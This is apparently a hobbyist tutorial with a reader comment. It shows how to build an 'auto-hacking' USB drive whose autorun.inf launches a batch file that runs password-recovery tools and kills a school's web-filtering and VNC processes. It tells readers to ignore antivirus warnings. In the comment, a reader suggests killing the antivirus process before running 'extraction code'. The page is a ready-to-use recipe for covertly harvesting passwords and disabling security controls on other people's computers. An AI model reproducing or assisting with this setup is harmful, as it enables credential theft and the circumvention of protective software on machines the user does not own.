You need two things:
1) A USB Drive devoted to this
2) The programs and files that I will show you how to make or where to get. If you have trouble making the two files that I show you how to create, they can be downloaded at the end of the Instructable.
OK PEOPLE!!!!!
THIS AUTO-HACKING USB DRIVE SIMPLY CONTAINS APPLICATIONS THAT RECOVER PASSWORDS AND SUCH. STOP LEAVING POSTS ABOUT HOW YOU DON'T UNDERSTAND WHAT GETS HACKED.
Step 1: A Brief Explanation
Step 2: The Autorun File
This file is the one that makes the pop-up window when you plug in the USB Drive. You can use this on any USB Drive, even if it has U3 on it.
Open Notepad (I'm using Notepad++) and type the following:
(autorun)
label=(Name you want the drive to have)
icon=(Icon file).ico
open=(Batch file we will make later).bat
action=(What you want the action to be)
MAKE SURE YOU DO NOT TYPE THE ()'s! Where it says (autorun), replace the parentheses with brackets (the buttons to the right of the "p" key on the keyboard. USE THE BOTTOM BRACKETS, NOT THE TWISTY FRENCH BRACKETS!)
Save this file as Autorun.inf
Make sure that you save it immediately inside your USB Drive, not inside any sub-folders (My Computer, Autohax0r).
Also, I have used an icon (an .ico file), so the USB Drive will have a different picture than the boring standard picture. To get one of these, I advise going to http://www.iconarchive.com/ to get an .ico file (you have to specifically download it as .ico). If you do this, save the icon in the same place as the Autorun file.
Step 3: The Batch File
Type this into Notepad:
@echo off
title KTX
start .\Applications\FOLDER\APPLICATION.exe
start .\CommandLine\Process.exe -k TermX.exe
start .\CommandLine\Process.exe -k WinVNC.exe
pause
goto eof
I will explain the commands used:
@echo off: Makes it so the file pops-up without showing the commands. Makes it look more professional.
title: Makes a title at the top of the batch file.
start: If you can't figure this one out, you should not be reading this Instructable.
pause: Pauses the file, waits for you to press any button.
goto: Sends the file to a different part of the script.
eof: End of file.
Also, TermX.exe is a program that my school uses to keep us out of certain websites. IT IS NOT THE FIREWALL. For info on WinVNC.exe, go to http://www.processlibrary.com/directory/files/winvnc.
Where it says \FOLDER\APPLICATION, you will change this in two steps.
Save this as KTX.bat, and place it in the same place (directory) as the Autorun.inf file.
Step 4: The "Hacking" Programs
Your computer might identify some as viruses, but don't worry. It only does this because some programs can find certain passwords.
Also, you might notice that I have a folder called "CommandLine." This is a VERY usefull program, and can be downloaded at http://www.beyondlogic.org/solutions/processutil/processutil.htm. There is also a hearty description at this page.
Step 5: Modifying KTX.bat
Go to the part of the Autorun file where it says "start .\Applications\FOLDER\APPLICATION.exe". You are going to change this. Also, add or subtract as many of this line as you need. If you have three programs to run, you need three lines of this code.
First, create a folder in the same place as the Autorun and KTX files, and name it Applications. Drag all the folders that contain the hacking programs into the Applications folder. You should come up with a directory like this:
"My Computer\AutoHax0r\Applications\HACKING FOLDERS HERE (with programs inside the folders)"
Also, you do not have to have the CommandLine in the KTX file. I just use it for my school.
I will include pictures.
Step 6: All Finished!
If you are confused as to how to make the batch file or the Autorun file, download them here.
Autohax0r Files.zip400 bytes












































Visit Our Store »
Go Pro Today »




thanks
@echo off
title {insert title}
start ./commandline/processes.exe -k {antivirus process title}
pause
{extraction code}
pause
{program start lines}
pause
goto eof
could something like this work? its alittle vague, sorry. (the extra pauses are to insure that the command completes (especially the extration code))
By the way, "eof" means "end of file".